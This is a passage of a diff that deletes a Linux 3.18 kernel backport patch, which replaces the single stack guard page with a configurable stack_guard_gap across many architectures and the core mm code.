-     s390 uses generic arch_get_unmapped_area()]
-Signed-off-by: Willy Tarreau <w@1wt.eu>
-[gkh: minor build fixes for 3.18]
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- Documentation/kernel-parameters.txt |   7 ++
- arch/arc/mm/mmap.c                  |   2 +-
- arch/arm/mm/mmap.c                  |   4 +-
- arch/frv/mm/elf-fdpic.c             |   2 +-
- arch/mips/mm/mmap.c                 |   2 +-
- arch/parisc/kernel/sys_parisc.c     |  15 ++--
- arch/powerpc/mm/slice.c             |   2 +-
- arch/sh/mm/mmap.c                   |   4 +-
- arch/sparc/kernel/sys_sparc_64.c    |   4 +-
- arch/sparc/mm/hugetlbpage.c         |   2 +-
- arch/tile/mm/hugetlbpage.c          |   2 +-
- arch/x86/kernel/sys_x86_64.c        |   4 +-
- arch/x86/mm/hugetlbpage.c           |   2 +-
- arch/xtensa/kernel/syscall.c        |   2 +-
- fs/hugetlbfs/inode.c                |   2 +-
- fs/proc/task_mmu.c                  |   4 -
- include/linux/mm.h                  |  53 ++++++-------
- mm/gup.c                            |   5 --
- mm/memory.c                         |  38 ---------
- mm/mmap.c                           | 149 +++++++++++++++++++++---------------
- 20 files changed, 147 insertions(+), 158 deletions(-)
-
-diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt
-index b2bdea19..9abe552 100644
---- a/Documentation/kernel-parameters.txt
-+++ b/Documentation/kernel-parameters.txt
-@@ -3324,6 +3324,13 @@ bytes respectively. Such letter suffixes can also be entirely omitted.
- 	spia_pedr=
- 	spia_peddr=
- 
-+	stack_guard_gap=	[MM]
-+			override the default stack gap protection. The value
-+			is in page units and it defines how many pages prior
-+			to (for stacks growing down) resp. after (for stacks
-+			growing up) the main stack are reserved for no other
-+			mapping. Default value is 256 pages.
-+
- 	stacktrace	[FTRACE]
- 			Enabled the stack tracer on boot up.
- 
-diff --git a/arch/arc/mm/mmap.c b/arch/arc/mm/mmap.c
-index 2e06d56..cf4ae69 100644
---- a/arch/arc/mm/mmap.c
-+++ b/arch/arc/mm/mmap.c
-@@ -64,7 +64,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index 5e85ed3..8f9d1cf 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -89,7 +89,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -140,7 +140,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 			addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 836f1470..efa59f1 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(current->mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			goto success;
- 	}
- 
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index f1baadd..9be924f 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -92,7 +92,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
-index 5aba01a..4dda73c 100644
---- a/arch/parisc/kernel/sys_parisc.c
-+++ b/arch/parisc/kernel/sys_parisc.c
-@@ -88,7 +88,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		unsigned long len, unsigned long pgoff, unsigned long flags)
- {
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	unsigned long task_size = TASK_SIZE;
- 	int do_color_align, last_mmap;
- 	struct vm_unmapped_area_info info;
-@@ -115,9 +115,10 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		else
- 			addr = PAGE_ALIGN(addr);
- 
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			goto found_addr;
- 	}
- 
-@@ -141,7 +142,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 			  const unsigned long len, const unsigned long pgoff,
- 			  const unsigned long flags)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
- 	int do_color_align, last_mmap;
-@@ -175,9 +176,11 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 			addr = COLOR_ALIGN(addr, last_mmap, pgoff);
- 		else
- 			addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			goto found_addr;
- 	}
- 
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index ded0ea1..4c14626 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -105,7 +105,7 @@ static int slice_area_is_free(struct mm_struct *mm, unsigned long addr,
- 	if ((mm->task_size - len) < addr)
- 		return 0;
- 	vma = find_vma(mm, addr);
--	return (!vma || (addr + len) <= vma->vm_start);
-+	return (!vma || (addr + len) <= vm_start_gap(vma));
- }
- 
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index 6777177..7df7d59 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -63,7 +63,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -113,7 +113,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index c690c8e..7f0f7c01 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -118,7 +118,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -181,7 +181,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 4242eab..2b6fae6 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -115,7 +115,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, HPAGE_SIZE);
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 8a00c7b..52deac2 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -237,7 +237,7 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index 30277e2..d050393 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -127,7 +127,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (end - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -166,7 +166,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c
-index 9161f76..c504866 100644
---- a/arch/x86/mm/hugetlbpage.c
-+++ b/arch/x86/mm/hugetlbpage.c
-@@ -144,7 +144,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/xtensa/kernel/syscall.c b/arch/xtensa/kernel/syscall.c
-index 5d3f7a1..1ff0b92 100644
---- a/arch/xtensa/kernel/syscall.c
-+++ b/arch/xtensa/kernel/syscall.c
-@@ -86,7 +86,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		/* At this point:  (!vmm || addr < vmm->vm_end). */
- 		if (TASK_SIZE - len < addr)
- 			return -ENOMEM;
--		if (!vmm || addr + len <= vmm->vm_start)
-+		if (!vmm || addr + len <= vm_start_gap(vmm))
- 			return addr;
- 		addr = vmm->vm_end;
- 		if (flags & MAP_SHARED)
-diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
-index 1e2872b..148c4e9 100644
---- a/fs/hugetlbfs/inode.c
-+++ b/fs/hugetlbfs/inode.c
-@@ -171,7 +171,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index af33fb7..aea2d0b 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -284,11 +284,7 @@ show_map_vma(struct seq_file *m, struct vm_area_struct *vma, int is_pid)
- 
- 	/* We don't show the stack guard page in /proc/maps */
- 	start = vma->vm_start;
--	if (stack_guard_page_start(vma, start))
--		start += PAGE_SIZE;
- 	end = vma->vm_end;
--	if (stack_guard_page_end(vma, end))
--		end -= PAGE_SIZE;
- 
- 	seq_setwidth(m, 25 + sizeof(void *) * 6 - 1);
- 	seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu ",
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index db853de..54ad2e4 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1242,34 +1242,6 @@ int set_page_dirty_lock(struct page *page);
- int clear_page_dirty_for_io(struct page *page);
- int get_cmdline(struct task_struct *task, char *buffer, int buflen);
- 
--/* Is the vma a continuation of the stack vma above it? */
--static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN);
--}
--
--static inline int stack_guard_page_start(struct vm_area_struct *vma,
--					     unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSDOWN) &&
--		(vma->vm_start == addr) &&
--		!vma_growsdown(vma->vm_prev, addr);
--}
--
--/* Is the vma a continuation of the stack vma below it? */
--static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP);
--}
--
--static inline int stack_guard_page_end(struct vm_area_struct *vma,
--					   unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSUP) &&
--		(vma->vm_end == addr) &&
--		!vma_growsup(vma->vm_next, addr);
--}
--
- extern struct task_struct *task_of_stack(struct task_struct *task,
- 				struct vm_area_struct *vma, bool in_group);
- 
-@@ -1930,6 +1902,7 @@ void page_cache_async_readahead(struct address_space *mapping,
- 
- unsigned long max_sane_readahead(unsigned long nr);
- 
-+extern unsigned long stack_guard_gap;
- /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
- extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
- 
-@@ -1958,6 +1931,30 @@ static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * m
- 	return vma;
- }
- 
-+static inline unsigned long vm_start_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_start = vma->vm_start;
-+
-+	if (vma->vm_flags & VM_GROWSDOWN) {
-+		vm_start -= stack_guard_gap;
-+		if (vm_start > vma->vm_start)
-+			vm_start = 0;
-+	}
-+	return vm_start;
-+}
-+
-+static inline unsigned long vm_end_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_end = vma->vm_end;
-+
-+	if (vma->vm_flags & VM_GROWSUP) {
-+		vm_end += stack_guard_gap;
-+		if (vm_end < vma->vm_end)
-+			vm_end = -PAGE_SIZE;
-+	}
-+	return vm_end;
-+}
-+
- static inline unsigned long vma_pages(struct vm_area_struct *vma)
- {
- 	return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
-diff --git a/mm/gup.c b/mm/gup.c
-index 3cec4df..ce1630b 100644
---- a/mm/gup.c
-+++ b/mm/gup.c
-@@ -275,11 +275,6 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
- 	unsigned int fault_flags = 0;
- 	int ret;
- 
--	/* For mlock, just skip the stack guard page. */
--	if ((*flags & FOLL_MLOCK) &&
--			(stack_guard_page_start(vma, address) ||
--			 stack_guard_page_end(vma, address + PAGE_SIZE)))
--		return -ENOENT;
- 	if (*flags & FOLL_WRITE)
- 		fault_flags |= FAULT_FLAG_WRITE;
- 	if (nonblocking)
-diff --git a/mm/memory.c b/mm/memory.c
-index 6ca26c3..0c4f5e3 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -2580,40 +2580,6 @@ out_release:
- }
- 
- /*
-- * This is like a special single-page "expand_{down|up}wards()",
-- * except we must first make sure that 'address{-|+}PAGE_SIZE'
-- * doesn't hit another vma.
-- */
--static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address)
--{
--	address &= PAGE_MASK;
--	if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) {
--		struct vm_area_struct *prev = vma->vm_prev;
--
--		/*
--		 * Is there a mapping abutting this one below?
--		 *
--		 * That's only ok if it's the same stack mapping
--		 * that has gotten split..
--		 */
--		if (prev && prev->vm_end == address)
--			return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM;
--
--		return expand_downwards(vma, address - PAGE_SIZE);
--	}
--	if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) {
--		struct vm_area_struct *next = vma->vm_next;
--
--		/* As VM_GROWSDOWN but s/below/above/ */
--		if (next && next->vm_start == address + PAGE_SIZE)
--			return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM;
--
--		return expand_upwards(vma, address + PAGE_SIZE);
--	}
--	return 0;
--}
--
--/*
-  * We enter with non-exclusive mmap_sem (to exclude vma changes,
-  * but allow concurrent faults), and pte mapped but not yet locked.
-  * We return with mmap_sem still held, but pte unmapped and unlocked.
-@@ -2633,10 +2599,6 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma,
- 	if (vma->vm_flags & VM_SHARED)
- 		return VM_FAULT_SIGBUS;
- 
--	/* Check if we need to add a guard page to the stack */
--	if (check_stack_guard_page(vma, address) < 0)
--		return VM_FAULT_SIGSEGV;
--
- 	/* Use the zero-page for reads */
- 	if (!(flags & FAULT_FLAG_WRITE)) {
- 		entry = pte_mkspecial(pfn_pte(my_zero_pfn(address),
-diff --git a/mm/mmap.c b/mm/mmap.c
-index f032671..14ccc94 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -290,6 +290,7 @@ SYSCALL_DEFINE1(brk, unsigned long, brk)
- 	unsigned long retval;
- 	unsigned long newbrk, oldbrk;
- 	struct mm_struct *mm = current->mm;
-+	struct vm_area_struct *next;
- 	unsigned long min_brk;
- 	bool populate;
- 
-@@ -334,7 +335,8 @@ SYSCALL_DEFINE1(brk, unsigned long, brk)
- 	}
- 
- 	/* Check against existing mmap mappings. */
--	if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE))
-+	next = find_vma(mm, oldbrk);
-+	if (next && newbrk + PAGE_SIZE > vm_start_gap(next))
- 		goto out;
- 
- 	/* Ok, looks good - let it rip. */
-@@ -357,10 +359,22 @@ out:
- 
- static long vma_compute_subtree_gap(struct vm_area_struct *vma)
- {
--	unsigned long max, subtree_gap;
--	max = vma->vm_start;
--	if (vma->vm_prev)
--		max -= vma->vm_prev->vm_end;
-+	unsigned long max, prev_end, subtree_gap;
-+
-+	/*
-+	 * Note: in the rare case of a VM_GROWSDOWN above a VM_GROWSUP, we
-+	 * allow two stack_guard_gaps between them here, and when choosing
-+	 * an unmapped area; whereas when expanding we only require one.
-+	 * That's a little inconsistent, but keeps the code here simpler.
-+	 */
-+	max = vm_start_gap(vma);
-+	if (vma->vm_prev) {
-+		prev_end = vm_end_gap(vma->vm_prev);
-+		if (max > prev_end)
-+			max -= prev_end;
-+		else
-+			max = 0;
-+	}
- 	if (vma->vm_rb.rb_left) {
- 		subtree_gap = rb_entry(vma->vm_rb.rb_left,
- 				struct vm_area_struct, vm_rb)->rb_subtree_gap;
-@@ -453,7 +467,7 @@ static void validate_mm(struct mm_struct *mm)
- 			anon_vma_unlock_read(anon_vma);
- 		}
- 
--		highest_address = vma->vm_end;
-+		highest_address = vm_end_gap(vma);
- 		vma = vma->vm_next;
- 		i++;
- 	}
-@@ -622,7 +636,7 @@ void __vma_link_rb(struct mm_struct *mm, struct vm_area_struct *vma,
- 	if (vma->vm_next)
- 		vma_gap_update(vma->vm_next);
- 	else
--		mm->highest_vm_end = vma->vm_end;
-+		mm->highest_vm_end = vm_end_gap(vma);
- 
- 	/*
- 	 * vma->vm_prev wasn't known when we followed the rbtree to find the
-@@ -874,7 +888,7 @@ again:			remove_next = 1 + (end > next->vm_end);
- 			vma_gap_update(vma);
- 		if (end_changed) {
- 			if (!next)
--				mm->highest_vm_end = end;
-+				mm->highest_vm_end = vm_end_gap(vma);
- 			else if (!adjust_next)
- 				vma_gap_update(next);
- 		}
-@@ -917,7 +931,7 @@ again:			remove_next = 1 + (end > next->vm_end);
- 		else if (next)
- 			vma_gap_update(next);
- 		else
--			mm->highest_vm_end = end;
-+			VM_WARN_ON(mm->highest_vm_end != vm_end_gap(vma));
- 	}
- 	if (insert && file)
- 		uprobe_mmap(insert);
-@@ -1740,7 +1754,7 @@ unsigned long unmapped_area(struct vm_unmapped_area_info *info)
- 
- 	while (true) {
- 		/* Visit left subtree if it looks promising */
--		gap_end = vma->vm_start;
-+		gap_end = vm_start_gap(vma);
- 		if (gap_end >= low_limit && vma->vm_rb.rb_left) {
- 			struct vm_area_struct *left =
- 				rb_entry(vma->vm_rb.rb_left,
-@@ -1751,7 +1765,7 @@ unsigned long unmapped_area(struct vm_unmapped_area_info *info)
- 			}
- 		}
- 
--		gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0;
-+		gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0;
- check_current:
- 		/* Check if current node has a suitable gap */
- 		if (gap_start > high_limit)
-@@ -1778,8 +1792,8 @@ check_current:
- 			vma = rb_entry(rb_parent(prev),
- 				       struct vm_area_struct, vm_rb);
- 			if (prev == vma->vm_rb.rb_left) {
--				gap_start = vma->vm_prev->vm_end;
--				gap_end = vma->vm_start;
-+				gap_start = vm_end_gap(vma->vm_prev);
-+				gap_end = vm_start_gap(vma);
- 				goto check_current;
- 			}
- 		}
-@@ -1843,7 +1857,7 @@ unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
- 
- 	while (true) {
- 		/* Visit right subtree if it looks promising */
--		gap_start = vma->vm_prev ? vma->vm_prev->vm_end : 0;
-+		gap_start = vma->vm_prev ? vm_end_gap(vma->vm_prev) : 0;
- 		if (gap_start <= high_limit && vma->vm_rb.rb_right) {
- 			struct vm_area_struct *right =
- 				rb_entry(vma->vm_rb.rb_right,
-@@ -1856,7 +1870,7 @@ unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
- 
- check_current:
- 		/* Check if current node has a suitable gap */
--		gap_end = vma->vm_start;
-+		gap_end = vm_start_gap(vma);
- 		if (gap_end < low_limit)
- 			return -ENOMEM;
- 		if (gap_start <= high_limit && gap_end - gap_start >= length)
-@@ -1882,7 +1896,7 @@ check_current:
- 				       struct vm_area_struct, vm_rb);
- 			if (prev == vma->vm_rb.rb_right) {
- 				gap_start = vma->vm_prev ?
--					vma->vm_prev->vm_end : 0;
-+					vm_end_gap(vma->vm_prev) : 0;
- 				goto check_current;
- 			}
- 		}
-@@ -1920,7 +1934,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		unsigned long len, unsigned long pgoff, unsigned long flags)
- {
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct vm_unmapped_area_info info;
- 
- 	if (len > TASK_SIZE - mmap_min_addr)
-@@ -1931,9 +1945,10 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -1956,7 +1971,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 			  const unsigned long len, const unsigned long pgoff,
- 			  const unsigned long flags)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
- 	struct vm_unmapped_area_info info;
-@@ -1971,9 +1986,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	/* requesting a specific address */
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)) &&
-+				(!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -2099,21 +2115,19 @@ find_vma_prev(struct mm_struct *mm, unsigned long addr,
-  * update accounting. This is shared with both the
-  * grow-up and grow-down cases.
-  */
--static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow)
-+static int acct_stack_growth(struct vm_area_struct *vma,
-+			     unsigned long size, unsigned long grow)
- {
- 	struct mm_struct *mm = vma->vm_mm;
- 	struct rlimit *rlim = current->signal->rlim;
--	unsigned long new_start, actual_size;
-+	unsigned long new_start;
- 
- 	/* address space limit tests */
- 	if (!may_expand_vm(mm, grow))
- 		return -ENOMEM;
- 
- 	/* Stack limit test */
--	actual_size = size;
--	if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN)))
--		actual_size -= PAGE_SIZE;
--	if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
-+	if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
- 		return -ENOMEM;
- 
- 	/* mlock limit tests */
-@@ -2154,17 +2168,30 @@ static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, uns
-  */
- int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- {
-+	struct vm_area_struct *next;
-+	unsigned long gap_addr;
- 	int error = 0;
- 
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
- 	/* Guard against wrapping around to address 0. */
--	if (address < PAGE_ALIGN(address+4))
--		address = PAGE_ALIGN(address+4);
--	else
-+	address &= PAGE_MASK;
-+	address += PAGE_SIZE;
-+	if (!address)
- 		return -ENOMEM;
- 
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address + stack_guard_gap;
-+	if (gap_addr < address)
-+		return -ENOMEM;
-+	next = vma->vm_next;
-+	if (next && next->vm_start < gap_addr) {
-+		if (!(next->vm_flags & VM_GROWSUP))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
- 	/* We must make sure the anon_vma is allocated. */
- 	if (unlikely(anon_vma_prepare(vma)))
- 		return -ENOMEM;
-@@ -2205,7 +2232,7 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- 				if (vma->vm_next)
- 					vma_gap_update(vma->vm_next);
- 				else
--					vma->vm_mm->highest_vm_end = address;
-+					vma->vm_mm->highest_vm_end = vm_end_gap(vma);
- 				spin_unlock(&vma->vm_mm->page_table_lock);
- 
- 				perf_event_mmap(vma);
-@@ -2225,6 +2252,8 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- int expand_downwards(struct vm_area_struct *vma,
- 				   unsigned long address)
- {
-+	struct vm_area_struct *prev;
-+	unsigned long gap_addr;
- 	int error;
- 
- 	address &= PAGE_MASK;
-@@ -2232,6 +2261,17 @@ int expand_downwards(struct vm_area_struct *vma,
- 	if (error)
- 		return error;
- 
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address - stack_guard_gap;
-+	if (gap_addr > address)
-+		return -ENOMEM;
-+	prev = vma->vm_prev;
-+	if (prev && prev->vm_end > gap_addr) {
-+		if (!(prev->vm_flags & VM_GROWSDOWN))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
- 	/* We must make sure the anon_vma is allocated. */
- 	if (unlikely(anon_vma_prepare(vma)))
- 		return -ENOMEM;
-@@ -2283,28 +2323,25 @@ int expand_downwards(struct vm_area_struct *vma,
- 	return error;
- }
- 
--/*
-- * Note how expand_stack() refuses to expand the stack all the way to
-- * abut the next virtual mapping, *unless* that mapping itself is also
-- * a stack mapping. We want to leave room for a guard page, after all
-- * (the guard page itself is not added here, that is done by the
-- * actual page faulting logic)
-- *
-- * This matches the behavior of the guard page logic (see mm/memory.c:
-- * check_stack_guard_page()), which only allows the guard page to be
-- * removed under these circumstances.
-- */
-+/* enforced gap between the expanding stack and other mappings. */
-+unsigned long stack_guard_gap = 256UL<<PAGE_SHIFT;
-+
-+static int __init cmdline_parse_stack_guard_gap(char *p)
-+{
-+	unsigned long val;
-+	char *endptr;
-+
-+	val = simple_strtoul(p, &endptr, 10);
-+	if (!*endptr)
-+		stack_guard_gap = val << PAGE_SHIFT;
-+
-+	return 0;
-+}
-+__setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
-+
- #ifdef CONFIG_STACK_GROWSUP
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *next;
--
--	address &= PAGE_MASK;
